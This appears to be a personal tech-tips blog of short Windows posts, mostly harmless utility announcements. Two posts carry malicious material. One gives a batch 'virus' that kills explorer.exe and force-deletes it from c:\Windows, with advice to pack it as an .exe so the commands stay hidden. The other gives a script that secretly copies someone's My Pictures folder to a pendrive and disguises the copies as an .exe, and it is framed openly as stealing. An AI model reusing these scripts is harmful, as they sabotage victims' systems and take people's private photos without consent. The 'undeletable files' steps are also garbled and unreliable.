1

Will be back soon...

Last week, i joined with my friends in the school hostel, (B.C.S Peruva) as my +2 board exam is starting on 1st April... This will be my last post in this blog. Internet and computer is just as water and air to me, without them i am nothing... I have many ideas and topics in ma mind to write about...
But, in this situation and atmosphere i cant do anything... I hope i can write and post them all after April 28..
So, see you guys... Miss you all....
We need your prayers for the exam..

0

Delete undeletable Files

I like to spend my month end to sort, clean and arrange the data in my PC. Most of the times I delete more than 2 GB files in one go. I always like to delete unused and unwanted files from my PC as my 320 GB hard disk is not enough for me. And most of the times when I try to delete items from the C drive, I can’t delete some.

Some days before, i got a new trick to delete undeletable files and is 100% working in all Operating Systems.

Follow the steps to delete undeletable files.

1) Open command prompt and leave it open.

2) Open Task Manager and kill the process 'explorer.exe' from the process tab

3) Leave the Task Manager open.

4) In the command prompt window, type 'del /y ' and hit enter.

5) Go back to Task Manager, click File, New Task and enter explorer.exe to start the GUI shell.

Now you can see that the undeletable file is deleted. There are many ways to delete undeletable files, and I suggest this because, it’s the easiest method to do it. Some undeletable files can’t be deleted by this method. I will share a few tricks to delete that types of files, in my coming chapters.

Feel free to comment this post.

1

Most simple & dangerous virus, I have ever created.


 As we all know, explorer.exe is an essential application that comes with our OS and is very necessary one. Without that application a normal user can’t do anything with his/her computer. With this concept, I just created a virus that damages the whole Operating System (OS) itself. That virus just deletes the application explorer.exe in c:\windows. But its not possible to delete the explorer.exe as the process ecplorer.exe is running in the computer. So, first we have to kill that process before deleting that application. Killing of that process can be done with the help of an application called pskill.exe which is available in the internet within the package PStools.  As usual open notepad to type the commands.
So, to kill the process explorer.exe, our first command should be this.
pskill.exe explorer.exe
Next thing we want to do is to delete the explorer.exe. As the explorer.exe is in c:\windows, the second command should be this.
del /f /q c:\Windows\explorer.exe
del is the command to delete, /f is to delete by forcing and /q is to execute the command in quite mode, and c:\Windows\explorer.exe is the file to delete. Now save the file as anything.bat. The application pskill.exe should be in the same folder as the .bat file is.
That’s all you want to do. Now the virus is ready to damage any windows PC. You can convert this application to .exe file so that no one will see the commands we typed. Don’t forget to pack the pskill.exe with the .bat file.
NOTE: Any proceedings and or activities related to the material contained within this article are exclusively your liability. The author will not be held responsible in the event any unlawful charges brought against any individuals by misusing the information in this article to any damage.

Feel free to comment this post.

0

Application to steal pictures from the ‘My Pictures’ folder.


 Our friends as well as our relatives will not allow us to copy their pictures in their computer. So, if we want their pictures, stealing is the only way to get that files. I have an application, that I created by myself to steal pictures from the ‘My Pictures’ folder. It’s just easy and amazing. You can also create that application by yourselves as these types of applications are not available on the internet. The only software you want to create this application is 7z.exe. If our friend/relative will see his/her pictures in our Pendrive, that we have stolen, he/she may scold us and may delete it too. So we want to hide that stolen pictures in our Pendrive.  First we want to make a folder in the Pendrive to copy all the pictures from the ‘My Pictures’ folder. S the command should be this:
md temp
Where md is the command to make directory. After the execution of this command, a new folder named ‘temp’ will be created. Now, we want to copy the pictures from the folder ‘my pictures’ to the folder temp. So the next command should be this.
copy "c:\users\%username%\pictures" %CD%\temp
where the copy is the command to copy files, %CD% denotes the Current Directory, %username% is a variable for the username, and ‘c:\users\%username%\pictures’ is the path to the my pictures. After the execution of the previous command, all the pictures in the folder ‘My Pictures’ will be copies to the folder ‘temp’. Now we have to hide all the pictures. We can just hide all the pictures by zipping all that files into an anything.exe file. Zipping can be done with the help of the application 7z.exe. So the next command should be this.
7z.exe a sha.exe %CD%\temp
Where a is the command to add files to the archive. Now the files are zipped into a file named sha.exe. Now we want to delete the files in the folder ‘temp’ that we have copied earlier. So the net command should be this.
del /q %CD%temp\*.*
Where del is the delete command and /q is for quite mode, and *.* denote all the files.
Now save the file as anything.bat. Now it’s ready to use. By running that anything.bat in the Pendrive, you will get a file named sha.exe. The only thing you want to do to get files inside sha.exe is to extract that file (sha.exe). Its just a small application,  but also an amazing one. Its 100% working because, I created it and was successful.


NOTE: Any proceedings and or activities related to the material contained within this article are exclusively your liability. The author will not be held responsible in the event any unlawful charges brought against any individuals by misusing the information in this article to any damage.



Feel free to comment this post.

1

Eject all the drives with one click.

Normally we eject our CDs by pushing the eject button in our CD/DVD drive.
Its a little tough to eject all the drives if we have more than one drives.
I have a program that ejects all the drives in one click.
It help the user to eject all the possible CD/DVD drives with in one click.
After Opening user will be given some time to put the CD/DVD disk into the tray.
That application will un-ejects the drives also.
You can get that application from here.
Feel free to comment.

0

Forget about your keyboard.

Windows operating system comes with an inbuilt virtual keyboard also known as 'On Screen Keyboard'.
Most of the windows users dont know about that application.
Its a very useful and funny inbuilt application in windows.
I have just created an application to start that 'On Screen Keyboard'.
You can download it here.
Just run it and forget about your keyboard.

0

Start Sound recorder with a single click

Sound recorder is an useful application in windows OS.
But its little hard to find that application.
I like to record sounds with that default application by windows.
As its difficult to find, I have created a small application that starts the default Sound recorder in Windows.
You can download it here.

Feel free to comment.

0

Restart eplorer.exe with Explorer Restart

We all know that our Operating System jams mainly because our explorer.exe crashes.
Just restarting the explorer.exe will help you to escape from that trouble.
Normally, we end the process explorer.exe from the task manager> processes.
But it needed little bit time to end and start explorer.exe in that way.
With that concept of restarting explorer.exe, i have created an application that restarts the explorer.exe within seconds...
I think , this application will be helpful to you too...
Fell free to comment this post and application.
You can download it here...

0

Print Current Sceen with Screen Shooter

Most of you may not be aware of the use of 'PrintScreen' button in our keyboard.
On clicking that button, the current screen that we see in our monitor will be copied to the clipboard.
And we can paste it in any image editor to get an output in any image format.
But it will take minutes.
I have created a new application to take the screen shot of the current screen.
Advantage of this application is that, there is no need to paste the image from the clipboard to any image editors to get an image file.
The program itself will create a png image of the current screen.
It's installation is silent.
You can take ScreenShots by just typing 'ss' without quotes in the run command.
You can download this application from here.

Feel free to comment this post and application.

1

Kill the current .bat execution with CMD Killer.

As you all may know that, a batch file is a text file containing a series of commands intended to be executed by the command interpreter.
Batch files are useful for running a sequence of executables automatically and are often used to automate repetitive or tedious processes.
DOS batch files have the filename extension .bat.

On clicking the batch file, the commands saved in the batch file will be executed, and sometimes the commands saved in the batch file will be dangerous.
There are batch commands to format all drives in PCs.
If we click on that type of files, its necessary to stop the execution of that batch file.
I have created a small application to stop the execution of the current running batch file.
As this application kills the CMD, I named this application as "CMD Killer".
I made it because, its a very useful application to me, because most of the times i work with batch files.
I think this application will be useful to you too.
You can download this small application from here.

Feel free to comment about this post and application.